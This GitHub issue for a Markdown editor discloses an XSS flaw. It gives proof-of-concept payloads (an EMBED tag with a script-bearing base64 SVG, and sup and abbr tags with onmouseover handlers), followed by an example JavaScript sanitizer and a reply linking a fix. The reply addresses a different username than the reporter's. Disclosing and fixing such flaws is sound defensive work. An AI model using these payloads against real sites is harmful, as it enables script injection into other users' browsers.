jbt / markdown-editor

Live (Github-flavored) Markdown Editor
http://jbt.github.com/markdown-editor
ISC License

XSS vulnerability on <abbr> and <sup><EMBED> label #106

Open j1nse opened 4 years ago

j1nse commented 4 years ago

This label and attack vector will cause XSS.

payload:

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIGlkPSJ4c3MiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgieHNzISIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">sup</sup>

<abbr style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">abbr</abbr>

If you type the payload, the XSS vulnerability will be triggered.
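As an added illustration of the defensive side (this is example code, not the editor's own code and not the change in the linked pull request): an allowlist HTML sanitizer in JavaScript that, run over the rendered Markdown before it is inserted into the page, neutralises the three vectors in this report. The element, attribute and URL-scheme allowlists are assumptions chosen for this example, and the payload inside `demo()` is a constructed, shortened copy of the one above.

```javascript
'use strict';

// Example sanitizer, not the project's code. Policy: allowlisted elements,
// per-element allowlisted attributes, no inline event handlers (on*), no
// inline style, no active-content elements (embed/object/iframe/script),
// and only http(s)/mailto or relative URLs in href/src.
const ALLOWED_TAGS = new Set([
  'a', 'abbr', 'b', 'blockquote', 'br', 'code', 'del', 'em', 'h1', 'h2', 'h3',
  'h4', 'h5', 'h6', 'hr', 'i', 'img', 'li', 'ol', 'p', 'pre', 'strong', 'sub',
  'sup', 'table', 'tbody', 'td', 'th', 'thead', 'tr', 'ul',
]);

// Attributes are opt-in per element; anything else (style, onmouseover,
// AllowScriptAccess, ...) is dropped. Assumed lists for this example.
const ALLOWED_ATTRS = {
  a: new Set(['href', 'title']),
  abbr: new Set(['title']),
  img: new Set(['src', 'alt', 'title']),
};

const URL_ATTRS = new Set(['href', 'src']);
const SAFE_SCHEME = /^(?:https?|mailto):/i;

// Accept a URL when it carries a safe scheme or no scheme at all (relative).
// data:, javascript:, vbscript: and any other scheme are rejected. Control
// characters and spaces are removed first so "java\tscript:" cannot slip by.
function isSafeUrl(value) {
  const v = value.replace(/[\u0000-\u0020]/g, '');
  if (SAFE_SCHEME.test(v)) return true;
  return !/^[a-zA-Z][a-zA-Z0-9+.-]*:/.test(v);
}

function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function escapeAttr(s) {
  return escapeText(s).replace(/"/g, '&quot;');
}

// Minimal tag/attribute tokenizer for the demonstration.
const TAG_RE = /<(\/?)([a-zA-Z][\w-]*)([^>]*)>/g;
const ATTR_RE = /([^\s=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

function parseAttrs(raw) {
  const attrs = [];
  ATTR_RE.lastIndex = 0;
  let m;
  while ((m = ATTR_RE.exec(raw)) !== null) {
    attrs.push({ name: m[1].toLowerCase(), value: m[2] ?? m[3] ?? m[4] ?? '' });
  }
  return attrs;
}

// Rebuild an opening tag with only the attributes the policy allows; return
// '' for elements outside the allowlist so they vanish from the output.
function sanitizeTag(name, rawAttrs) {
  const tag = name.toLowerCase();
  if (!ALLOWED_TAGS.has(tag)) return '';
  const allowed = ALLOWED_ATTRS[tag] || new Set();
  const kept = [];
  for (const { name: attr, value } of parseAttrs(rawAttrs)) {
    if (!allowed.has(attr)) continue;
    if (URL_ATTRS.has(attr) && !isSafeUrl(value)) continue;
    kept.push(` ${attr}="${escapeAttr(value)}"`);
  }
  return `<${tag}${kept.join('')}>`;
}

// Walk the HTML: text between tags is escaped, tags are rewritten or dropped.
// Contents of a dropped element are kept as plain (escaped) text.
function sanitizeHtml(html) {
  let out = '';
  let last = 0;
  TAG_RE.lastIndex = 0;
  let m;
  while ((m = TAG_RE.exec(html)) !== null) {
    out += escapeText(html.slice(last, m.index));
    last = m.index + m[0].length;
    const [, slash, name, rawAttrs] = m;
    if (slash) {
      out += ALLOWED_TAGS.has(name.toLowerCase()) ? `</${name.toLowerCase()}>` : '';
    } else {
      out += sanitizeTag(name, rawAttrs);
    }
  }
  return out + escapeText(html.slice(last));
}

// Constructed, shortened copy of the reported payload (base64 body replaced).
const DEMO_PAYLOAD =
  '<EMBED SRC="data:image/svg+xml;base64,AAAA" type="image/svg+xml" AllowScriptAccess="always"></EMBED>' +
  ' <sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert(\'xss\')">sup</sup>' +
  ' <abbr style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert(\'xss\')">abbr</abbr>';

function demo() {
  return sanitizeHtml(DEMO_PAYLOAD); // -> " <sup>sup</sup> <abbr>abbr</abbr>"
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The tokenizer here is deliberately small and has known limits (an attribute value containing a literal `>` ends the tag early), so the policy it encodes belongs on top of a real HTML parser in production (DOMPurify, or `DOMParser` in the browser). The durable point is the policy itself: elements and attributes are opt-in, `style` and every `on*` handler are never in the list, and URL-bearing attributes reject `data:` and `javascript:` so an SVG carrying a script cannot be smuggled through `<embed>` or `<img>`.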

ColeBennett commented 4 years ago

Hi @shequ123, thanks for creating an issue for this! I opened a pull request implementing changes to fix these problems and it correctly blocks those scenarios from happening in the editor. Pull request: https://github.com/jbt/markdown-editor/pull/110